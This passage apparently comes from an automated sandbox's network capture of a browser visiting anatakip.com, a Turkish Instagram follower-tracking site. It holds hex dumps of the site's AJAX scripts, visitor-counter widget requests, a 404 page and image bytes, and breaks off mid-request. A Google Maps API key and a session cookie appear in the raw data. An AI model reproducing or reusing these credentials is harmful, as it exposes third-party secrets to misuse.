                    2024-05-26 22:57:35 UTC1369INData Raw: 6c 3a 27 2f 61 63 63 6f 75 6e 74 2f 65 64 69 74 2d 6d 65 64 69 61 2f 27 2b 69 64 2c 74 79 70 65 3a 27 47 45 54 27 7d 29 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 7b 24 28 27 23 6d 6f 64 61 6c 45 64 69 74 4d 65 64 69 61 49 6e 6e 65 72 27 29 2e 68 74 6d 6c 28 64 61 74 61 29 3b 7d 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 75 70 64 61 74 65 4d 65 64 69 61 28 69 64 29 7b 24 28 27 23 6d 6f 64 61 6c 45 64 69 74 4d 65 64 69 61 27 29 2e 6d 6f 64 61 6c 28 27 68 69 64 65 27 29 3b 24 2e 61 6a 61 78 28 7b 75 72 6c 3a 27 2f 61 63 63 6f 75 6e 74 2f 65 64 69 74 2d 6d 65 64 69 61 2f 27 2b 69 64 2c 74 79 70 65 3a 27 50 4f 53 54 27 2c 64 61 74 61 54 79 70 65 3a 27 6a 73 6f 6e 27 2c 64 61 74 61 3a 24 28 27 23 66 6f 72 6d 45 64 69 74 4d 65 64 69 61 27 29 2e 73
                    Data Ascii: l:'/account/edit-media/'+id,type:'GET'}).done(function(data){$('#modalEditMediaInner').html(data);});}function updateMedia(id){$('#modalEditMedia').modal('hide');$.ajax({url:'/account/edit-media/'+id,type:'POST',dataType:'json',data:$('#formEditMedia').s
                    2024-05-26 22:57:35 UTC1369INData Raw: 79 69 6e 2e 2e 27 29 3b 24 2e 61 6a 61 78 28 7b 75 72 6c 3a 27 2f 61 63 63 6f 75 6e 74 2f 66 6f 6c 6c 6f 77 27 2c 64 61 74 61 54 79 70 65 3a 27 6a 73 6f 6e 27 2c 74 79 70 65 3a 27 50 4f 53 54 27 2c 64 61 74 61 3a 27 69 64 3d 27 2b 69 64 7d 29 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 7b 69 66 28 64 61 74 61 2e 73 74 61 74 75 73 3d 3d 27 65 72 72 6f 72 27 29 7b 62 74 6e 2e 68 74 6d 6c 28 6f 6c 64 48 74 6d 6c 29 3b 7d 0a 65 6c 73 65 7b 62 74 6e 2e 61 74 74 72 28 22 6f 6e 63 6c 69 63 6b 22 2c 22 75 6e 66 6f 6c 6c 6f 77 28 27 22 2b 69 64 2b 22 27 29 22 29 3b 69 66 28 64 61 74 61 2e 69 73 5f 70 72 69 76 61 74 65 3d 3d 31 29 7b 62 74 6e 2e 68 74 6d 6c 28 27 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 3e 3c 2f 69 3e
                    Data Ascii: yin..');$.ajax({url:'/account/follow',dataType:'json',type:'POST',data:'id='+id}).done(function(data){if(data.status=='error'){btn.html(oldHtml);}else{btn.attr("onclick","unfollow('"+id+"')");if(data.is_private==1){btn.html('<i class="fa fa-clock-o"></i>
                    2024-05-26 22:57:35 UTC1369INData Raw: 6e 2e 68 74 6d 6c 28 29 3b 62 74 6e 2e 68 74 6d 6c 28 27 42 65 6b 6c 65 79 69 6e 2e 2e 27 29 3b 24 2e 61 6a 61 78 28 7b 75 72 6c 3a 27 2f 61 63 63 6f 75 6e 74 2f 62 6c 6f 63 6b 27 2c 64 61 74 61 54 79 70 65 3a 27 6a 73 6f 6e 27 2c 74 79 70 65 3a 27 50 4f 53 54 27 2c 64 61 74 61 3a 27 69 64 3d 27 2b 69 64 7d 29 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 7b 69 66 28 64 61 74 61 2e 73 74 61 74 75 73 3d 3d 27 65 72 72 6f 72 27 29 7b 62 74 6e 2e 68 74 6d 6c 28 6f 6c 64 48 74 6d 6c 29 3b 7d 0a 65 6c 73 65 7b 24 28 27 23 62 74 6e 50 6f 70 42 6c 6f 63 6b 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 27 6e 6f 6e 65 27 29 3b 24 28 27 23 62 74 6e 50 6f 70 55 6e 62 6c 6f 63 6b 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 27 27 29 3b 62 74
                    Data Ascii: n.html();btn.html('Bekleyin..');$.ajax({url:'/account/block',dataType:'json',type:'POST',data:'id='+id}).done(function(data){if(data.status=='error'){btn.html(oldHtml);}else{$('#btnPopBlock').css('display','none');$('#btnPopUnblock').css('display','');bt
                    2024-05-26 22:57:35 UTC1369INData Raw: 65 64 2f 76 31 2f 76 69 65 77 3f 6b 65 79 3d 41 49 7a 61 53 79 41 54 32 58 52 77 59 58 55 54 45 54 6d 69 49 6b 59 76 72 43 67 36 5f 43 77 78 74 63 64 70 4d 68 49 26 63 65 6e 74 65 72 3d 27 2b 6c 61 74 2b 27 2c 27 2b 6c 6e 67 2b 27 26 7a 6f 6f 6d 3d 31 37 26 6d 61 70 74 79 70 65 3d 73 61 74 65 6c 6c 69 74 65 22 20 61 6c 6c 6f 77 66 75 6c 6c 73 63 72 65 65 6e 3e 3c 2f 69 66 72 61 6d 65 3e 27 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 65 74 4c 69 67 68 74 42 6f 78 28 64 65 73 74 72 6f 79 46 69 72 73 74 29 7b 24 6c 69 67 68 74 42 6f 78 3d 24 28 27 23 65 6e 74 72 79 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 27 29 3b 69 66 28 64 65 73 74 72 6f 79 46 69 72 73 74 29 7b 24 6c 69 67 68 74 42 6f 78 2e 64 61 74 61 28 27 6c 69 67 68 74 47 61 6c 6c 65 72 79 27 29 2e
                    Data Ascii: ed/v1/view?key=AIzaSyAT2XRwYXUTETmiIkYvrCg6_CwxtcdpMhI&center='+lat+','+lng+'&zoom=17&maptype=satellite" allowfullscreen></iframe>');}function setLightBox(destroyFirst){$lightBox=$('#entry-list-container');if(destroyFirst){$lightBox.data('lightGallery').
                    2024-05-26 22:57:35 UTC1369INData Raw: 72 3d 24 28 27 23 63 6f 6d 6d 65 6e 74 73 27 2b 69 64 29 3b 67 48 74 6d 6c 3d 61 72 72 43 6f 6d 6d 65 6e 74 4c 69 6b 65 72 73 44 61 74 61 5b 69 64 5d 3b 69 66 28 63 61 72 6f 75 73 65 6c 49 6e 64 65 78 26 26 63 61 72 6f 75 73 65 6c 49 6e 64 65 78 21 3d 30 29 7b 7d 0a 65 6c 73 65 7b 24 63 6f 6d 6d 65 6e 74 43 6f 6e 74 61 69 6e 65 72 2e 68 74 6d 6c 28 67 48 74 6d 6c 29 3b 69 66 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 39 39 32 29 7b 24 28 27 23 63 6f 6d 6d 65 6e 74 73 27 2b 69 64 2b 27 20 2e 6c 61 7a 79 27 29 2e 73 68 6f 77 28 29 2e 6c 61 7a 79 6c 6f 61 64 28 7b 63 6f 6e 74 61 69 6e 65 72 3a 24 28 27 2e 6c 67 2d 63 75 72 72 65 6e 74 27 29 2c 74 68 72 65 73 68 6f 6c 64 3a 35 30 30 7d 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6c 61 7a 79 22
                    Data Ascii: r=$('#comments'+id);gHtml=arrCommentLikersData[id];if(carouselIndex&&carouselIndex!=0){}else{$commentContainer.html(gHtml);if(window.innerWidth<992){$('#comments'+id+' .lazy').show().lazyload({container:$('.lg-current'),threshold:500}).removeClass("lazy"
                    2024-05-26 22:57:35 UTC1369INData Raw: 74 61 74 75 73 21 3d 27 73 75 63 63 65 73 73 27 29 7b 61 6c 65 72 74 28 27 52 65 73 69 6d 20 73 69 6c 69 6e 65 6d 65 64 69 21 20 54 65 6b 72 61 72 20 64 65 6e 65 79 65 62 69 6c 69 72 73 69 6e 2e 27 29 3b 7d 0a 65 6c 73 65 7b 24 28 27 23 70 72 6f 66 69 6c 65 50 68 6f 74 6f 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 64 61 74 61 2e 6d 65 73 73 61 67 65 29 3b 7d 7d 29 3b 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 65 77 4d 65 73 73 61 67 65 28 72 65 63 69 70 69 65 6e 74 73 2c 6d 65 64 69 61 69 64 29 7b 24 28 27 23 6d 6f 64 61 6c 4e 65 77 4d 65 73 73 61 67 65 27 29 2e 6d 6f 64 61 6c 28 27 73 68 6f 77 27 29 3b 24 28 27 23 6d 6f 64 61 6c 4e 65 77 4d 65 73 73 61 67 65 49 6e 6e 65 72 27 29 2e 68 74 6d 6c 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 62 6f
                    Data Ascii: tatus!='success'){alert('Resim silinemedi! Tekrar deneyebilirsin.');}else{$('#profilePhoto').attr('src',data.message);}});}}function newMessage(recipients,mediaid){$('#modalNewMessage').modal('show');$('#modalNewMessageInner').html('<div class="modal-bo
                    2024-05-26 22:57:35 UTC1369INData Raw: 3d 31 3f 24 28 27 23 66 69 6c 65 4e 65 77 4d 65 73 73 61 67 65 27 29 5b 30 5d 2e 66 69 6c 65 73 5b 30 5d 3a 6e 75 6c 6c 3b 69 66 28 72 65 63 69 70 69 65 6e 74 73 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 61 6c 65 72 74 28 27 45 6e 20 61 7a 20 31 20 61 6c c4 b1 63 c4 b1 20 65 6b 6c 65 6d 65 6c 69 73 69 6e 21 27 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 0a 69 66 28 73 74 72 4e 65 77 4d 65 73 73 61 67 65 3d 3d 27 27 26 26 21 6d 65 64 69 61 69 64 26 26 21 6d 65 64 69 61 29 7b 61 6c 65 72 74 28 27 4d 65 73 61 6a 20 76 65 79 61 20 6d 65 64 79 61 64 61 6e 20 62 69 72 69 6e 69 20 65 6b 6c 65 6d 65 6b 20 7a 6f 72 75 6e 6c 75 64 75 72 21 27 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 0a 76 61 72 20 61 6c 6c 52 65 63 69 70 69 65 6e 74 73 3d 27 27 3b 72 65 63 69
                    Data Ascii: =1?$('#fileNewMessage')[0].files[0]:null;if(recipients.length==0){alert('En az 1 alc eklemelisin!');return false;}if(strNewMessage==''&&!mediaid&&!media){alert('Mesaj veya medyadan birini eklemek zorunludur!');return false;}var allRecipients='';reci
                    2024-05-26 22:57:35 UTC965INData Raw: 3e 27 29 3b 7d 29 3b 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 4b 65 65 70 53 65 73 73 69 6f 6e 28 29 7b 24 2e 61 6a 61 78 28 7b 74 79 70 65 3a 27 47 45 54 27 2c 75 72 6c 3a 27 2f 61 6a 61 78 2f 6b 65 65 70 2d 73 65 73 73 69 6f 6e 27 2c 64 61 74 61 54 79 70 65 3a 27 6a 73 6f 6e 27 7d 29 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 7b 69 66 28 64 61 74 61 2e 6e 6f 6e 52 65 61 64 54 68 72 65 61 64 43 6f 75 6e 74 3e 30 29 7b 24 28 27 23 6e 6f 6e 52 65 61 64 54 68 72 65 61 64 43 6f 75 6e 74 27 29 2e 68 74 6d 6c 28 64 61 74 61 2e 6e 6f 6e 52 65 61 64 54 68 72 65 61 64 43 6f 75 6e 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 7d 7d 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 4b 65 65 70 53 65 73 73 69 6f 6e 2c 35 2a 36 30 2a 31
                    Data Ascii: >');});}}function KeepSession(){$.ajax({type:'GET',url:'/ajax/keep-session',dataType:'json'}).done(function(data){if(data.nonReadThreadCount>0){$('#nonReadThreadCount').html(data.nonReadThreadCount).removeClass('hidden');}});setTimeout(KeepSession,5*60*1


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.549747104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:38 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:38 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/56.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15d855c0c0cdd-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:38 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.549745104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:38 UTC664OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:38 UTC740INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:57:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqY4wTzEiz1%2FQajQnHUaOe9XX9TmzvbYoSlJX6QKsc%2BKZd7rBypyWBWjLTd2rtw3FgJA%2B2bt2frHZoCeQAT0xBBiyA7xAC6Bi4758r8rVaVhNIqx5Ky4Eyu2fL57f1o%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d8559774358-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:38 UTC629INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:38 UTC1369INData Raw: 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e 20 2c
                    Data Ascii: style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin ,
                    2024-05-26 22:57:38 UTC1369INData Raw: 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e
                    Data Ascii: llapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav n
                    2024-05-26 22:57:38 UTC1369INData Raw: 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                    Data Ascii: 5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="
                    2024-05-26 22:57:38 UTC1369INData Raw: 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d 2e 6c
                    Data Ascii: ><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r].l
                    2024-05-26 22:57:38 UTC1189INData Raw: 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 79 3a 20
                    Data Ascii: color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overflow-y:
                    2024-05-26 22:57:38 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.549746104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:38 UTC591OUTGET /classic/14/1431.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:38 UTC431INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:38 GMT
                    Content-Type: image/png
                    Content-Length: 1602
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-642"
                    expires: Sat, 18 May 2024 18:22:22 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 794116
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15d883f627c94-EWR
                    2024-05-26 22:57:38 UTC938INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 c7 50 4c 54 45 ff ff ff c6 c6 c6 e3 e3 e3 bf bf bf 77 77 77 b9 b9 b9 e7 e7 e7 88 88 88 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7
                    Data Ascii: PNGIHDRQpPLTEwwwtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_
                    2024-05-26 22:57:38 UTC664INData Raw: cf b2 f3 bd 62 ff 9f cb 82 51 76 82 91 18 b9 f1 13 71 eb e1 24 76 1a f3 44 36 8a 30 fa 8a 6c 4b cf 92 25 98 48 f5 5c ca 35 8c 6c d7 bc 5e 6f ff 09 5f a8 a3 5e 2f 0d 83 d6 7b 25 7c 43 80 06 5e 1f 0d 80 a7 a1 54 71 a2 04 34 54 cf bd fc 88 d1 85 74 bb cb 75 e6 07 b5 60 d1 b1 a9 2c 59 d6 d1 45 65 84 87 d7 87 7a 2e 1f e1 55 fe e6 55 a0 98 7a ee 49 36 b9 c6 ec db 62 9f 9f d4 59 51 14 d7 b1 ec e7 68 91 d2 85 5b 44 d0 89 6a 3a a8 2c 6a 2c 4a ae f1 99 6b 4b ae 31 31 e1 b9 e7 ea 57 62 98 67 bf c7 23 a5 5f 0f 78 14 50 d7 a3 56 29 94 34 b5 2c d5 42 a8 ef 1c cf 63 24 dc 16 92 67 7e 27 ee df bb 2f 08 03 e6 0c a6 f9 f7 7b 82 0c c2 04 95 10 a8 28 5c 80 10 96 07 01 04 a9 e7 ac c9 8b 31 f2 a4 65 26 9f f8 46 24 5d 49 d2 27 7d bb a2 ef 4a 8b a5 ca ef 1f ea a8 9f 07 15 ca eb
                    Data Ascii: bQvq$vD60lK%H\5l^o_^/{%|C^Tq4Ttu`,YEez.UUzI6bYQh[Dj:,j,JkK11Wbg#_xPV)4,Bc$g~'/{(\1e&F$]I'}J


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.549749104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:39 UTC589OUTGET /classic/00/56.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
